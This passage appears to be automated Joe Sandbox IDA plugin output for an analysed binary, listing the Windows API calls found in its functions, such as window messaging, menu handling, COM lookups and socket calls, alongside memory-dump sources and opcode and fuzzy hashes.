                                                                                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00DF60A4
                                                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 00DF60FC
                                                                                              • _wcslen.LIBCMT ref: 00DF610E
                                                                                              • _wcslen.LIBCMT ref: 00DF6119
                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00DF6175
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 763830540-0
                                                                                              • Opcode ID: ba8a0de9f8ac1e69a92a2ac8cd6acff5e6be1a9fdea6aad9eaee0bd51e70db31
                                                                                              • Instruction ID: 02491ac74144d32a9ec34ee6810db66b7d2c0d3618e533de227865ecc3308e4f
                                                                                              • Opcode Fuzzy Hash: ba8a0de9f8ac1e69a92a2ac8cd6acff5e6be1a9fdea6aad9eaee0bd51e70db31
                                                                                              • Instruction Fuzzy Hash: BF218E3590025CABDB109FA4DC889FEBBB8EB05324F158216FB25EA185E770C585CF70
                                                                                              APIs
                                                                                              • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DC07D1,80070057,?,?,?,00DC0BEE), ref: 00DC08BB
                                                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DC07D1,80070057,?,?), ref: 00DC08D6
                                                                                              • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DC07D1,80070057,?,?), ref: 00DC08E4
                                                                                              • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DC07D1,80070057,?), ref: 00DC08F4
                                                                                              • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DC07D1,80070057,?,?), ref: 00DC0900
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                              • String ID:
                                                                                              • API String ID: 3897988419-0
                                                                                              • Opcode ID: 132a1ad16ba00ce46375f890217079bf702c5ec760f147a3c13d3ed384421b4d
                                                                                              • Instruction ID: d90f3eba7110852e7c86bd0e78cbf1f04253a23a31a3f43b626cd7f272d3d486
                                                                                              • Opcode Fuzzy Hash: 132a1ad16ba00ce46375f890217079bf702c5ec760f147a3c13d3ed384421b4d
                                                                                              • Instruction Fuzzy Hash: A2015A76600309EBDB105F64DC04FAA7EAEEF48792F188028F945D3211DB70DE40DAB0
                                                                                              APIs
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00DD0A39,?,00DD3C56,?,00000001,00DA3ACE,?), ref: 00DD0BE0
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00DD0A39,?,00DD3C56,?,00000001,00DA3ACE,?), ref: 00DD0BED
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00DD0A39,?,00DD3C56,?,00000001,00DA3ACE,?), ref: 00DD0BFA
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00DD0A39,?,00DD3C56,?,00000001,00DA3ACE,?), ref: 00DD0C07
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00DD0A39,?,00DD3C56,?,00000001,00DA3ACE,?), ref: 00DD0C14
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00DD0A39,?,00DD3C56,?,00000001,00DA3ACE,?), ref: 00DD0C21
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandle
                                                                                              • String ID:
                                                                                              • API String ID: 2962429428-0
                                                                                              • Opcode ID: 3f55e0179328daf0b3b082556109d37486fcf1ce2bc3dba1091ae490e87d5e96
                                                                                              • Instruction ID: 22c87c50c57646e6df05d7410a4c001ae5fb40cc8f71f6fbff0eacd575071b69
                                                                                              • Opcode Fuzzy Hash: 3f55e0179328daf0b3b082556109d37486fcf1ce2bc3dba1091ae490e87d5e96
                                                                                              • Instruction Fuzzy Hash: 7301A271804B15DFC730AF6AD980816FBF5EF903153198A3FD19252A31C7B1A949CFA0
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00DC64E7
                                                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 00DC64FE
                                                                                              • MessageBeep.USER32(00000000), ref: 00DC6516
                                                                                              • KillTimer.USER32(?,0000040A), ref: 00DC6532
                                                                                              • EndDialog.USER32(?,00000001), ref: 00DC654C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3741023627-0
                                                                                              • Opcode ID: bb35ac8e72eacd053688590c9e75b980f6ad4c5897421c000a56be7eb60c3786
                                                                                              • Instruction ID: 736a56a7d6d24a8ac60b5b7750094bdfead250e322a34ac2fb79bc645dbe8390
                                                                                              • Opcode Fuzzy Hash: bb35ac8e72eacd053688590c9e75b980f6ad4c5897421c000a56be7eb60c3786
                                                                                              • Instruction Fuzzy Hash: 41016D30510709ABEB205B20DD4EFA677BABB10B05F04466DA587E20E1DBF4EA54CBB0
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00D9264E
                                                                                                • Part of subcall function 00D92D58: RtlFreeHeap.NTDLL(00000000,00000000,?,00D9DB71,00E31DC4,00000000,00E31DC4,00000000,?,00D9DB98,00E31DC4,00000007,00E31DC4,?,00D9DF95,00E31DC4), ref: 00D92D6E
                                                                                                • Part of subcall function 00D92D58: GetLastError.KERNEL32(00E31DC4,?,00D9DB71,00E31DC4,00000000,00E31DC4,00000000,?,00D9DB98,00E31DC4,00000007,00E31DC4,?,00D9DF95,00E31DC4,00E31DC4), ref: 00D92D80
                                                                                              • _free.LIBCMT ref: 00D92660
                                                                                              • _free.LIBCMT ref: 00D92673
                                                                                              • _free.LIBCMT ref: 00D92684
                                                                                              • _free.LIBCMT ref: 00D92695
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: 26fbf3284da845e478aa5e1f54f9e966359e699c47e8c834887054ade648e753
                                                                                              • Instruction ID: 69d7b7e75fad053158da866e0dac47e3d36992681117fecd0aa7c3747c661b10
                                                                                              • Opcode Fuzzy Hash: 26fbf3284da845e478aa5e1f54f9e966359e699c47e8c834887054ade648e753
                                                                                              • Instruction Fuzzy Hash: CBF03A70909528AF8B15AF96BC09C693F68FF54751315024EF614B2378C7B00A4BAFF4
                                                                                              APIs
                                                                                                • Part of subcall function 00D805D2: EnterCriticalSection.KERNEL32(00E3170C,?,00000000,?,00D6D1DA,00E33540,00000001,00000000,?,?,00DDEF39,?,?,00000000,00000001,?), ref: 00D805DD
                                                                                                • Part of subcall function 00D805D2: LeaveCriticalSection.KERNEL32(00E3170C,?,00D6D1DA,00E33540,00000001,00000000,?,?,00DDEF39,?,?,00000000,00000001,?,00000001,00E32430), ref: 00D8061A
                                                                                                • Part of subcall function 00D80433: __onexit.LIBCMT ref: 00D80439
                                                                                              • __Init_thread_footer.LIBCMT ref: 00DE6B95
                                                                                                • Part of subcall function 00D80588: EnterCriticalSection.KERNEL32(00E3170C,00000000,?,00D6D208,00E33540,00DA27E9,00000001,00000000,?,?,00DDEF39,?,?,00000000,00000001,?), ref: 00D80592
                                                                                                • Part of subcall function 00D80588: LeaveCriticalSection.KERNEL32(00E3170C,?,00D6D208,00E33540,00DA27E9,00000001,00000000,?,?,00DDEF39,?,?,00000000,00000001,?,00000001), ref: 00D805C5
                                                                                                • Part of subcall function 00DD3EF6: LoadStringW.USER32(00000066,?,00000FFF,00DFDCEC), ref: 00DD3F3E
                                                                                                • Part of subcall function 00DD3EF6: LoadStringW.USER32(?,?,00000FFF,?), ref: 00DD3F64
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                                                                              • String ID: x3$x3$x3
                                                                                              • API String ID: 1072379062-3783253891
                                                                                              • Opcode ID: 9ef10311ea3a271e7bda4058ae48360e5fcb13b4e9e1289519df0b5c5e1b6ab6
                                                                                              • Instruction ID: 3c3c44f55fbce03e865f952204f5b52ff2d2721495389dd3f77b445edce4289c
                                                                                              • Opcode Fuzzy Hash: 9ef10311ea3a271e7bda4058ae48360e5fcb13b4e9e1289519df0b5c5e1b6ab6
                                                                                              • Instruction Fuzzy Hash: C2C1CD71A00149AFCB14EF69C881EBEB7B9EF58340F148069F955AB291DB70ED44CBB0
                                                                                              APIs
                                                                                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00DCCAC6
                                                                                              • DeleteMenu.USER32(?,00000007,00000000), ref: 00DCCB0C
                                                                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00E32990,018565D0), ref: 00DCCB55
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Delete$InfoItem
                                                                                              • String ID: 0
                                                                                              • API String ID: 135850232-4108050209
                                                                                              • Opcode ID: c01620c2055a418f43ed86d6032abb22f97d8529137d4a52635c12c40698c99f
                                                                                              • Instruction ID: 0c19a1b3e39e1101685ba3f753cacc473914e0e68a2db0ec323d0f0dc5040bd5
                                                                                              • Opcode Fuzzy Hash: c01620c2055a418f43ed86d6032abb22f97d8529137d4a52635c12c40698c99f
                                                                                              • Instruction Fuzzy Hash: 0241AF705153429FD720DF64C846F2ABBE5EF84324F04461DEAA9D7291D730E804CB72
                                                                                              APIs
                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00DFDCD0,00000000,?,?,?,?), ref: 00DF4E09
                                                                                              • GetWindowLongW.USER32 ref: 00DF4E26
                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00DF4E36
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Long
                                                                                              • String ID: SysTreeView32
                                                                                              • API String ID: 847901565-1698111956
                                                                                              • Opcode ID: ac8a6f81fea5d16a078691d22f0cdfd8b2af0ce25c79ca121c9be1ac4a923c70
                                                                                              • Instruction ID: 96be34156c9db7a7bbdb30b6be79288ffd399a7fc70e09561ad8ae17bd58fc04
                                                                                              • Opcode Fuzzy Hash: ac8a6f81fea5d16a078691d22f0cdfd8b2af0ce25c79ca121c9be1ac4a923c70
                                                                                              • Instruction Fuzzy Hash: 0C315031110209AFDF219E78DC45BFB7BAAEB48334F298715FA75922D0D770A8509B70
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00DF489F
                                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00DF48B3
                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00DF48D7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window
                                                                                              • String ID: SysMonthCal32
                                                                                              • API String ID: 2326795674-1439706946
                                                                                              • Opcode ID: 4a68dec56c860665922d13d040c2e89dd7ab805307f1bba538b8e6ed42b98851
                                                                                              • Instruction ID: 0de0477a408981c54fed4a15babaf6c466c52987b0f943555aea595a1f50fe7d
                                                                                              • Opcode Fuzzy Hash: 4a68dec56c860665922d13d040c2e89dd7ab805307f1bba538b8e6ed42b98851
                                                                                              • Instruction Fuzzy Hash: 0D219F3260021DAFEF158F90CC46FEB3B69EF48764F154114FB15AB190D6B1A8559BA0
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00DF419F
                                                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00DF41AF
                                                                                              • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00DF41D5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$MoveWindow
                                                                                              • String ID: Listbox
                                                                                              • API String ID: 3315199576-2633736733
                                                                                              • Opcode ID: e0068d4bea32a5c2c28bd18b80ed37533148e05b4c69c477528a990c460d1ce3
                                                                                              • Instruction ID: 0f2a929e38b11f2f398cb659efbd7625feeb1178be42489a62baef10231209a8
                                                                                              • Opcode Fuzzy Hash: e0068d4bea32a5c2c28bd18b80ed37533148e05b4c69c477528a990c460d1ce3
                                                                                              • Instruction Fuzzy Hash: A421BE3261021CBBEB218F54DC84EBB376EEF99754F06C114FA059B190CA719C9287B0
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00DF4BAE
                                                                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00DF4BC3
                                                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00DF4BD0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID: msctls_trackbar32
                                                                                              • API String ID: 3850602802-1010561917
                                                                                              • Opcode ID: f13a2ae70633e8575b1fc0e9bb68265e370741312bbfe846b4d3c3040cc2a293
                                                                                              • Instruction ID: 0d20eacdb041376c634b506a4863227d3ba85d3943b17e86227e5ea2d858240c
                                                                                              • Opcode Fuzzy Hash: f13a2ae70633e8575b1fc0e9bb68265e370741312bbfe846b4d3c3040cc2a293
                                                                                              • Instruction Fuzzy Hash: 2E11E03124020CBEEF215F69CC06FBB7BA8EF85B24F128518FB55E60A1D671D8219B30
                                                                                              APIs
                                                                                              • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00DF6220
                                                                                              • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00DF624D
                                                                                              • DrawMenuBar.USER32(?), ref: 00DF625C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$InfoItem$Draw
                                                                                              • String ID: 0
                                                                                              • API String ID: 3227129158-4108050209
                                                                                              • Opcode ID: bf4ead31e419e024e0b9dc49c820199bbe94d7e7d3b1d1e58da37d825c8692a4
                                                                                              • Instruction ID: ac21be029a222462a6bddd89c3354779952d36d2e6c47a11e5474636daf2ba85
                                                                                              • Opcode Fuzzy Hash: bf4ead31e419e024e0b9dc49c820199bbe94d7e7d3b1d1e58da37d825c8692a4
                                                                                              • Instruction Fuzzy Hash: F2017931500208AFDB109F50DC88BAA7BB5FB45310F04C095EA49DA250DB308984EF30
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e1630d2c0145a88dcd943aec86de143294935036829b2cdd72ce751e89220f26
                                                                                              • Instruction ID: a66002c6ea45e1a969d48295974671373158d0829549bc9090eb8de0b87c3146
                                                                                              • Opcode Fuzzy Hash: e1630d2c0145a88dcd943aec86de143294935036829b2cdd72ce751e89220f26
                                                                                              • Instruction Fuzzy Hash: D0C13975A0020AEFDB14CF94C894FAABBB5FF48704F248598E515EB251D731EE81DBA0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: __alldvrm$_strrchr
                                                                                              • String ID:
                                                                                              • API String ID: 1036877536-0
                                                                                              • Opcode ID: 173a905e0583d248f4586312a6838000a577cfe73f6efb9ac5c35750ff0a0cfb
                                                                                              • Instruction ID: 7064350c3e3afbd39dc80885fafdc1dd784d1729b4b06874ccacbb5f7d2605de
                                                                                              • Opcode Fuzzy Hash: 173a905e0583d248f4586312a6838000a577cfe73f6efb9ac5c35750ff0a0cfb
                                                                                              • Instruction Fuzzy Hash: 37A11672A003869FDF25CF68C891FBEBBE4EF55310F1842A9E5859B243D6749942C770
                                                                                              APIs
                                                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00E00BD4,?), ref: 00DC0E80
                                                                                              • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00E00BD4,?), ref: 00DC0E98
                                                                                              • CLSIDFromProgID.OLE32(?,?,00000000,00DFDCE0,000000FF,?,00000000,00000800,00000000,?,00E00BD4,?), ref: 00DC0EBD
                                                                                              • _memcmp.LIBVCRUNTIME ref: 00DC0EDE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: FromProg$FreeTask_memcmp
                                                                                              • String ID:
                                                                                              • API String ID: 314563124-0
                                                                                              • Opcode ID: b10fbc1b51344d6ab709384f89fcba47d0c402d6da6e1b5d02596b50af22e934
                                                                                              • Instruction ID: 2d0a67d90ccf64127b0f72384341433177cfe652c8e97df62285984bf940d082
                                                                                              • Opcode Fuzzy Hash: b10fbc1b51344d6ab709384f89fcba47d0c402d6da6e1b5d02596b50af22e934
                                                                                              • Instruction Fuzzy Hash: CB81E971A0020AEFCB04DF94C984EEEBBB9FF89315F244558F516AB250DB71AE45CB60
                                                                                              APIs
                                                                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 00DE245A
                                                                                              • WSAGetLastError.WSOCK32 ref: 00DE2468
                                                                                              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00DE24E7
                                                                                              • WSAGetLastError.WSOCK32 ref: 00DE24F1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
